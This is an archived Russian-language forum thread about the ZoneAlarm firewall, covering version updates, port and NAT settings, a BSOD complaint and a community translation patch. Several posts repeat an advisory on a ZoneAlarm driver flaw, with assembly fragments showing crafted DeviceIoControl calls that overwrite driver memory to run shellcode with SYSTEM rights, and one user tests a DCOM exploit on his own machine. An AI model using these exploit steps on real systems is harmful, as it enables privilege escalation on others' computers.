А тем временем Free версия обновилась до 3.7.202
» ZoneAlarm (-Anti-virus, -Pro, -Security Suite)
mp3exchanger
Цитата:
С каких это пор Opera стала качалкой...
А что показывает FlashGet вместо размера файла?
Я думаю, что причина не в ZA. Всё-таки посмотри настройки FlashGet'а
Насколько я знаю в Опере есть своя качалка, и настройки Flash Geta здесь не причом.
После сноса ZA все становится на свои места. Но в новой версии 4.0.123.012 эта проблема исчезла.
Кто мне в двух словах скажет, в чем отличие версий zoneAlarm Pro, Plus и Pro plus Web?
А то на их путаном дурацком офсайте, похоже, нет сравнительной таблицы.
Выполнение произвольного кода в ZoneAlarm.
Уязвимость обнаружена в драйвере устройства в ZoneAlarm. Атакующий может получить полный контроль над уязвимой системой.
Посылая специально обработанное форматированное сообщение к ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver), атакующий может перезаписать часть памяти драйвера устройства. В результате атакующий может выполнить произвольный код на системе:
Первый сигнал должен быть послан, чтобы перезаписать определенный участок памяти, в нашем случае, этом может быть один из операторов условного перехода:
push 0 ;overlapped
push offset bytes_returned ;bytes returned
push 4 ;lpOutBuffer size
push STATMENT_INSTRUCTION_POINTER ;memory to overwrite
push 0 ;lpInBuffer size
push 0 ;lpInBuffer
push 8400000fh ;guess what X-D
push vsdatant_handle ;device handle
call DeviceIoControl ;send it!
Правильный STATMENT_INSTRUCTION_POINTER должен перезаписать адрес к 00060001h (например). После распределения памяти в этом адресе (вставка shellcode bla bla bla), второй сигнал должен быть послан, чтобы внедриться во вставленный код. Это может быть сделано посылкой другого сигнала:
LpInBuffer:
db STATMENT_OVERWRITTEN_NUMBER ;where to jump
db 7 dup (0) ;data?
dd temp_buff ;temp buffer
db 10 dup (0) ;some space
После посылки второго фальшивого сообщения, драйвер устройства перейдет к STATEMENT оффсету, который был перезаписан первым "сигналом". В результате атакующий может получить выполнить произвольный код с SYSTEM привилегиями.
Уязвимость обнаружена в Local ZoneAlarm Firewall все версии (проверено на 3.1)
Способов устранения обнаруженной уязвимости не существует в настоящее время.
http://www.securitylab.ru
ЗЫ. Все пакости выискивают в нашем ZA...
Уязвимость обнаружена в драйвере устройства в ZoneAlarm. Атакующий может получить полный контроль над уязвимой системой.
Посылая специально обработанное форматированное сообщение к ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver), атакующий может перезаписать часть памяти драйвера устройства. В результате атакующий может выполнить произвольный код на системе:
Первый сигнал должен быть послан, чтобы перезаписать определенный участок памяти, в нашем случае, этом может быть один из операторов условного перехода:
push 0 ;overlapped
push offset bytes_returned ;bytes returned
push 4 ;lpOutBuffer size
push STATMENT_INSTRUCTION_POINTER ;memory to overwrite
push 0 ;lpInBuffer size
push 0 ;lpInBuffer
push 8400000fh ;guess what X-D
push vsdatant_handle ;device handle
call DeviceIoControl ;send it!
Правильный STATMENT_INSTRUCTION_POINTER должен перезаписать адрес к 00060001h (например). После распределения памяти в этом адресе (вставка shellcode bla bla bla), второй сигнал должен быть послан, чтобы внедриться во вставленный код. Это может быть сделано посылкой другого сигнала:
LpInBuffer:
db STATMENT_OVERWRITTEN_NUMBER ;where to jump
db 7 dup (0) ;data?
dd temp_buff ;temp buffer
db 10 dup (0) ;some space
После посылки второго фальшивого сообщения, драйвер устройства перейдет к STATEMENT оффсету, который был перезаписан первым "сигналом". В результате атакующий может получить выполнить произвольный код с SYSTEM привилегиями.
Уязвимость обнаружена в Local ZoneAlarm Firewall все версии (проверено на 3.1)
Способов устранения обнаруженной уязвимости не существует в настоящее время.
http://www.securitylab.ru
ЗЫ. Все пакости выискивают в нашем ZA...
Вот ребята которые это нашли...
http://sec-labs.hack.pl/advisories/seclabs-adv-zone-alarm-04-08-2003.txt
Но они говорят что тестировали толька на 3.1 а на других наверное тоже
работает...
Хотя ZoneLabs не опровергли пока эту информацию....
http://sec-labs.hack.pl/advisories/seclabs-adv-zone-alarm-04-08-2003.txt
Но они говорят что тестировали толька на 3.1 а на других наверное тоже
работает...
Хотя ZoneLabs не опровергли пока эту информацию....
люди, хелп.
как настроить для internet conncetion sharing его?
он блокирует все запросы которые идут с 192.168.0.2 (комп в LAN'е)
как настроить для internet conncetion sharing его?
он блокирует все запросы которые идут с 192.168.0.2 (комп в LAN'е)
Цитата:
как настроить для internet conncetion sharing его?-Насколько помню, там были правила для адресов. Вот берешь этот 192.168.0.2, и прописываешь ему нечто типа "если порт ... а траффик ... , -пропустить. Подробнее не помню, с апреля на посту сижу.
он блокирует все запросы которые идут с 192.168.0.2 (комп в LAN'е)
bredonosec
ZAP > Firewall > Advanced > This computer i a NAT Getway
ZAP > Firewall > Advanced > This computer i a NAT Getway
Привет!
только что поставил Зап, до этого не пользовался подобными прогами, поэтому прошу не сильно пинать ногами за вопрос.
Вопрос по поводу недавнего эксплоита, который вызывает перезагрузку машины (связанную с ошибкой в RPC). Я пробовал со второй машины в локалке запускать этот эксплоит. Все работает как нужно - мой компьютер успешно перезагружается (я специально не ставил патч от MS, чтобы проверить как работает Зап). В Запе в expert добавил tcp 135 порт и он его успешно блокировал, когда я повторно попытался атаковать свою машину.
Теперь вопрос. В данном случае я прочитал какие порты закрыть, чтобы избежать этой "каки", но ведь могут быть в будущем и другие.
Посоветуйте новичку, что нужно позакрывать: все порты входящие? Я попробовал добавить в "Firewall"->"Expert"->"Add", то что по дефолту, где все стоит на "Any", но, почему-то, это не помогло. В этом случае атака нормально проходила. Что я не так сделал. Может не внимательно читал топик, но так и не встретил, что-то типа: "Как настроить Зап для полных чайников". Может кто порекомендует, где подобное посмотреть?
только что поставил Зап, до этого не пользовался подобными прогами, поэтому прошу не сильно пинать ногами за вопрос.
Вопрос по поводу недавнего эксплоита, который вызывает перезагрузку машины (связанную с ошибкой в RPC). Я пробовал со второй машины в локалке запускать этот эксплоит. Все работает как нужно - мой компьютер успешно перезагружается (я специально не ставил патч от MS, чтобы проверить как работает Зап). В Запе в expert добавил tcp 135 порт и он его успешно блокировал, когда я повторно попытался атаковать свою машину.
Теперь вопрос. В данном случае я прочитал какие порты закрыть, чтобы избежать этой "каки", но ведь могут быть в будущем и другие.
Посоветуйте новичку, что нужно позакрывать: все порты входящие? Я попробовал добавить в "Firewall"->"Expert"->"Add", то что по дефолту, где все стоит на "Any", но, почему-то, это не помогло. В этом случае атака нормально проходила. Что я не так сделал. Может не внимательно читал топик, но так и не встретил, что-то типа: "Как настроить Зап для полных чайников". Может кто порекомендует, где подобное посмотреть?
karabas
1. ti dolzen ponat 4to u ZAPa 2 zoni 1. Trusted - LAN
2. Internet - Internet
tak vot esli ti primenaesh exploit iz LANa k sebe to on budet rabotat t.k na LAN u zapa menee zestokie pravila
a iz Interneta etot exploit neproiydet t.k zap blokiruet 135-139,445 porti
Цитата:
nee tak nelza!
4tobi zakritsa ot DCOM exploita idem ZAP > Firewall > (Trusted zone) constum > block incoming tcp ports > 135
1. ti dolzen ponat 4to u ZAPa 2 zoni 1. Trusted - LAN
2. Internet - Internet
tak vot esli ti primenaesh exploit iz LANa k sebe to on budet rabotat t.k na LAN u zapa menee zestokie pravila
a iz Interneta etot exploit neproiydet t.k zap blokiruet 135-139,445 porti
Цитата:
все порты входящие
nee tak nelza!
4tobi zakritsa ot DCOM exploita idem ZAP > Firewall > (Trusted zone) constum > block incoming tcp ports > 135
SXP
Цитата:
Я именно так и сделал. Но у меня вопрос немного не об этом, как блокировать другие возможные атаки? они же могут через другие порты работать. Поэтому я и спросил про "блокировать все порты".
И еще возник вопрос. За несколько часов эксплуатации и экспериментов Зап уже два раза валил машину. BSOD выдывал ошибку в rdbss.sys. Я подозреваю, что именно он (ZAP) причина этого, т.к. раньше такого не видел. В гугле нашел несколько сообщений в конференциях об этом, но так и не понял, есть ли какой-то фикс от MS, решающий проблему? Сталкивался ли кто-то? Может это из-за того, что не установлен SP1?
Цитата:
4tobi zakritsa ot DCOM exploita idem ZAP > Firewall > (Trusted zone) constum > block incoming tcp ports > 135
Я именно так и сделал. Но у меня вопрос немного не об этом, как блокировать другие возможные атаки? они же могут через другие порты работать. Поэтому я и спросил про "блокировать все порты".
И еще возник вопрос. За несколько часов эксплуатации и экспериментов Зап уже два раза валил машину. BSOD выдывал ошибку в rdbss.sys. Я подозреваю, что именно он (ZAP) причина этого, т.к. раньше такого не видел. В гугле нашел несколько сообщений в конференциях об этом, но так и не понял, есть ли какой-то фикс от MS, решающий проблему? Сталкивался ли кто-то? Может это из-за того, что не установлен SP1?
karabas
Цитата:
zdat pojavlenija a potom zakrivat sootvetstvenie porti!
Цитата:
vratli eto on t.k u drugih vse ok!
Добавлено
karabas
http://support.microsoft.com/default.aspx?kbid=329175
postav SP4
Цитата:
как блокировать другие возможные атаки
zdat pojavlenija a potom zakrivat sootvetstvenie porti!
Цитата:
За несколько часов эксплуатации и экспериментов Зап уже два раза валил машину
vratli eto on t.k u drugih vse ok!
Добавлено
karabas
http://support.microsoft.com/default.aspx?kbid=329175
postav SP4
Пардон, но я забыл сказать, что у меня WinXP.
Еще возникла проблема.
Есть компьтер "А" на нем стоит Зап. Он подключен к локальной сети, которая в TrustedZones. На компе "А" есть вторая сетевая, к которой подключен второй компьтер "Б". Если компьютер "Б" включен, то при загрузке компа "А" зап успешно эту подсетку с одним компом "Б" добавляет в TrustedZones. Но если в момент загрузки комп "Б" был выключен (XP сразу показывает, что подключение по этой локальной сети отсутствует), то этой TrustedZone там нет. И если потом включить комп "Б", то эта зона не добавляется в Зап. Нужно лишь перезагружать комп "А", чтобы это произошло.
Можно ли его как-то заставить запоминать эти trustedZones? или хотябы вручную заставить пересканировать налицие сетей без перезагрузки?
Спасибо, сорри, если это уже спрашивали
Есть компьтер "А" на нем стоит Зап. Он подключен к локальной сети, которая в TrustedZones. На компе "А" есть вторая сетевая, к которой подключен второй компьтер "Б". Если компьютер "Б" включен, то при загрузке компа "А" зап успешно эту подсетку с одним компом "Б" добавляет в TrustedZones. Но если в момент загрузки комп "Б" был выключен (XP сразу показывает, что подключение по этой локальной сети отсутствует), то этой TrustedZone там нет. И если потом включить комп "Б", то эта зона не добавляется в Зап. Нужно лишь перезагружать комп "А", чтобы это произошло.
Можно ли его как-то заставить запоминать эти trustedZones? или хотябы вручную заставить пересканировать налицие сетей без перезагрузки?
Спасибо, сорри, если это уже спрашивали
ZoneAlarm Plus 4.0.146.029
http://download.zonelabs.com/bin/free/1026_trial/zaplusSetup_40_146_029.exe
http://download.zonelabs.com/bin/free/1026_trial/zaplusSetup_40_146_029.exe
В принципе закончены работы по русификации ZoneAlarm Pro with Web Filtering 4.0.146.029. Осталась только одна проблема, с которой мне самому не справиться. Нужна ваша помощь!
Пожалуйста, те у кого стоит операционка семейства Windows отличная от XP и ZoneAlarm версии 4.х, будьте добры отпишите, по какому пути в вашей операционке можно найти следующие файлы:
vsinit.dll
vsmon.exe
В ХР первый находится по пути C:\Windows\System32\
Второй по пути C:\Windows\System32\ZoneLabs\
Есть подозрения, что в старых операционках System32 может быть заменено на System.
Чем быстрее я соберу статистику, тем быстрее выложу русификатор!
Пожалуйста, те у кого стоит операционка семейства Windows отличная от XP и ZoneAlarm версии 4.х, будьте добры отпишите, по какому пути в вашей операционке можно найти следующие файлы:
vsinit.dll
vsmon.exe
В ХР первый находится по пути C:\Windows\System32\
Второй по пути C:\Windows\System32\ZoneLabs\
Есть подозрения, что в старых операционках System32 может быть заменено на System.
Чем быстрее я соберу статистику, тем быстрее выложу русификатор!
m0nkrus
может, для xp отдельно уже можно выложить?
может, для xp отдельно уже можно выложить?
m0nkrus
Система win98se, ZoneAlarm Pro version 4.0.146.029:
vsinint.dll - находится в c:\windows\system\
vsmon.exe - в c:\windows\system\ZoneLabs\
Для той же системы win98se в ZoneAlarm Pro version 4.0.123.012:
оба файла в тех же вышеприведенных папках.
Система win98se, ZoneAlarm Pro version 4.0.146.029:
vsinint.dll - находится в c:\windows\system\
vsmon.exe - в c:\windows\system\ZoneLabs\
Для той же системы win98se в ZoneAlarm Pro version 4.0.123.012:
оба файла в тех же вышеприведенных папках.
Mady
Благодарю.
Проблема решена. Русификатор будет выложен сегодня поздно вечером.
Благодарю.
Проблема решена. Русификатор будет выложен сегодня поздно вечером.
Русификатор для ZoneAlarm Pro with Web Filtering 4.0.146.029
Альтернативная ссылка 1 (страница загрузки)
Альтернативная ссылка 2 (страница загрузки)
Альтернативная ссылка 3-1 (страница загрузки - часть 1)
Альтернативная ссылка 3-2 (страница загрузки - часть 2)
Все альтернативные ссылки - это обменники. Время, сколько файлы будут там лежать, регулируется не мной.
Огромное спасибо группе UOFG и особенно ее члену HarmEr'у за помощь в работе над русификатором.
Пользуйтесь
Альтернативная ссылка 1 (страница загрузки)
Альтернативная ссылка 2 (страница загрузки)
Альтернативная ссылка 3-1 (страница загрузки - часть 1)
Альтернативная ссылка 3-2 (страница загрузки - часть 2)
Все альтернативные ссылки - это обменники. Время, сколько файлы будут там лежать, регулируется не мной.
Огромное спасибо группе UOFG и особенно ее члену HarmEr'у за помощь в работе над русификатором.
Пользуйтесь
m0nkrus
Цитата:
Молодец! Спасибо! Опробовал... Всё ОК!
Нет ли в планах Help перевести?
Цитата:
Русификатор для ZoneAlarm Pro with Web Filtering 4.0.146.029
Молодец! Спасибо! Опробовал... Всё ОК!
Нет ли в планах Help перевести?
mihas83
Цитата:
Не-а. Хватит с вас и перевода программы обучения.
Я хелпами не занимаюсь. А 90% юзеров ими не пользуются, так что...
Цитата:
Нет ли в планах Help перевести?
Не-а. Хватит с вас и перевода программы обучения.
Я хелпами не занимаюсь. А 90% юзеров ими не пользуются, так что...
Цитата:
Русификатор для ZoneAlarm Pro with Web Filtering 4.0.146.029
Цитата:
- это обменникина сайте
: http://www.frol.ru/ru/rus/zapwwf4.0.146.029rus.zip
Я смотрю в последней версии баг с недоступностью инета после выхода из hibernate так и не пофиксили! Приходится ZA перезапускать 
Или это фича такая хитрая и я что-то пропустил
Или это фича такая хитрая и я что-то пропустил
Widok
Благодарю! Добавлено в шапку, как впрочем и ссылка на MSI Lab.
Все временные ссылки из шапки убираю, оставил только долгоиграющие.
Благодарю! Добавлено в шапку, как впрочем и ссылка на MSI Lab.
Все временные ссылки из шапки убираю, оставил только долгоиграющие.
Цитата:
Выполнение произвольного кода в ZoneAlarm.
Уязвимость обнаружена в драйвере устройства в ZoneAlarm. Атакующий может получить полный контроль над уязвимой системой.
Посылая специально обработанное форматированное сообщение к ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver), атакующий может перезаписать часть памяти драйвера устройства. В результате атакующий может выполнить произвольный код на системе:
Первый сигнал должен быть послан, чтобы перезаписать определенный участок памяти, в нашем случае, этом может быть один из операторов условного перехода:
push 0 ;overlapped
push offset bytes_returned ;bytes returned
push 4 ;lpOutBuffer size
push STATMENT_INSTRUCTION_POINTER ;memory to overwrite
push 0 ;lpInBuffer size
push 0 ;lpInBuffer
push 8400000fh ;guess what X-D
push vsdatant_handle ;device handle
call DeviceIoControl ;send it!
Правильный STATMENT_INSTRUCTION_POINTER должен перезаписать адрес к 00060001h (например). После распределения памяти в этом адресе (вставка shellcode bla bla bla), второй сигнал должен быть послан, чтобы внедриться во вставленный код. Это может быть сделано посылкой другого сигнала:
LpInBuffer:
db STATMENT_OVERWRITTEN_NUMBER ;where to jump
db 7 dup (0) ;data?
dd temp_buff ;temp buffer
db 10 dup (0) ;some space
После посылки второго фальшивого сообщения, драйвер устройства перейдет к STATEMENT оффсету, который был перезаписан первым "сигналом". В результате атакующий может получить выполнить произвольный код с SYSTEM привилегиями.
Уязвимость обнаружена в Local ZoneAlarm Firewall все версии (проверено на 3.1)
Способов устранения обнаруженной уязвимости не существует в настоящее время.
http://www.securitylab.ru
ЗЫ. Все пакости выискивают в нашем ZA...
Люди! А про ето кто-то что-то сказать может?
Если такая дрянь существует в версиях 4.0.х.х , то какой тогда от ZAРа толк?
KADABRA
на трешке проверяли они.
На последней версии почему-то никто не тестировал
imho, уже должны были пофиксить.
P.S. Кстати, в этом топике уже пролетала данная информация
на трешке проверяли они.
На последней версии почему-то никто не тестировал
imho, уже должны были пофиксить.
P.S. Кстати, в этом топике уже пролетала данная информация
Подскажите, чем почистить список компонентов (Program Control > Components) от несуществующих, либо удалить все оттуда подчистую. В самом ЗА такая опция не нашлась. 
infini
правая клавиша на компоненте в списке - Remove
правая клавиша на компоненте в списке - Remove
Страницы: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667
Предыдущая тема: WhereIsIt? / Where Is It?
Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.